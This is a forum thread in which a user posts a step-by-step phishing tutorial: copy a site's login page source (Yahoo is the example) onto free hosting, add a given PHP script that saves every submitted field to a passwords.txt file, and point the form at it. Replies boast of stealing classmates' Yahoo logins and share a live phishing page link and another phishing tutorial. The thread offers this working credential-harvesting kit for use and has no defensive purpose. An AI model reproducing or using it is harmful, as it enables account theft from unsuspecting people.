Jump to content

Phishing Guide


Vazelos

Recommended Posts

fish-trolling-basic-spinner.jpg

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

No i am joking lol

 

 

 

 

Guide

 

 

Hello dear user here is one of my guides... a phising site... Let's start

 

 

First thing we want to do is find a website that allows us to make our own websites. For now, lets just use Ripway.

 

1. Sign up and create a account.

 

Ok good. The very next step we do is find the website we want people to type personal info in. Examples are yahoo, youtube, runescape, or any other website that we want info on. Now, i bet your wondering,"I don't have any knowledge on how to make a website!!". Calm down, this step is easy as well. Im going to use yahoo.

1. Go to the login page of the website

2. Press Ctrl U. (works with firefox)

---this should open up another window with lots of scripts on it. This is called the Source Code. This code is available to every website and what this does is these scripts is how the website is used to be made.

3. Copy this code.


 

Now we want to convince viewers this is the real deal. So go back to Ripway and go to "my files". This is what you should see.

6xxiew.jpg

So far so good. Now to make our clone website we have to put it on the web. Go to "create text file" and paste the coding we copied earlier. Name the file, "login.php". Press "create"

1. Create text file

2. paste website Source code into the space

3. Name the file login.php

4. Create


 

 

Congratulations! you made a website! . As you can see, the URL is different. This is the only way people can tell if it is real. The next thing we need to do is make the username and password get sent to us. Copy this code below and save it somewhere.

 

Quote:<?php

header ('Location: http://PUTAWEBSITEHERE.com ');

$handle = fopen("passwords.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

 

The next step is to transfer the information of the user to us! So go to create a text file again. Paste the code above and save the file as "phishing.php". Then create.

1. Create text file

2. Paste phishing code into area.

3. Save file as phishing.php.

4. Create

 

It should look just like this!

2ludpgo.jpg

 

Now click on "edit" under "phishing.php". The code right here:

header ('Location: http://PUTAWEBSITEHERE.com ');

 

means when the user clicks submit, this is the website that the user will be redirected to. So go head and replace header ('Location:

 

'); with the page that you copied or want the viewer to be redirected to.

1. Change header ('Location:

 

'); to website you want viewers to be sent to.

2. Finish editing the changes and create.


 

Now so far all we have is the script to do so. So what we need to do now is to change the script in our "login.php" so that information can be sent to us. This is the hardest part of this process. *note* every website is not the same! Some are easy to find the info than others!

 

Click on "edit" underneath "login.php". Press ctrl F, this command lets us look for things, and search for "action=". replace the URL that ends in .php with our phishing.php Url

1. Copy the Direct Link under phishing.php and copy it.

2. Click edit underneath login.php

 

Here is the most confusing part. In the Source code, there is a URL where the password and login info are sent to. These usually end in .php and has the word username and password. Since each is different, its hard to write this next step.

 

3. Find the line where the information is actually being sent to.

4. Replace that line with are direct link phishing.php

--that line for yahoo.com looks like.

<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">


 

 

--Ok, let me try to explain once more. When someone logs into yahoo, the information is sent to the server. The way the info is being sent is by URL, like every other website. When we replace the that link with our phishing.php link, we made it so that the info is sent to us! not to the server. understand now?

5. Replace the red with our phishing.php direct link.

6. Press Create

WELL DONE! That is phishing! Now to test the site, all you do is give the "login.php" direct link to someone. They get on unaware and type in the pass and username. Then a txt document is create that contains the pass and username.

 

To find the pass and username, just go to ripway and look in files. you should now see a new document called "passes.txt". Click on that, and there you go!! Document only works if someone typed in info on your FLP site.

 

 

~Enjoy Vazelos.

 

 

Edit: There are many ways to make one. This is one and simple.

 

 

Link to comment
Share on other sites

The page its not working anymore. i tryed as example, the yahoo login, all was fine, after 2/3 hours, didnt worked anymore.

Maybe cuz Ripway.com is having some problms?

 

 

 

I think, after i get some passwords, all thing crash, or its blocked.

 

 

Btw i was made 1 on appserv, works great:D

 

I got some of my classmates IDS:))

on yahoo rofl =))

my site

http://djpliku.iad.ro/Lineage%202%20Augment/index.html

Link to comment
Share on other sites

  • 2 weeks later...

[gr] exo anoiksei ena topic me to pos na kaneis mia msn phishing page.. gt o *Vazelos* peire +1 karma kai ego oxi? epeidi aftos to ekane sta agglika?

oriste kai to link ---> http://www.maxcheaters.com/forum/index.php?topic=112956.0

[/gr]

Link to comment
Share on other sites

  • 3 weeks later...
  • 4 months later...
  • 1 year later...

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now


×
×
  • Create New...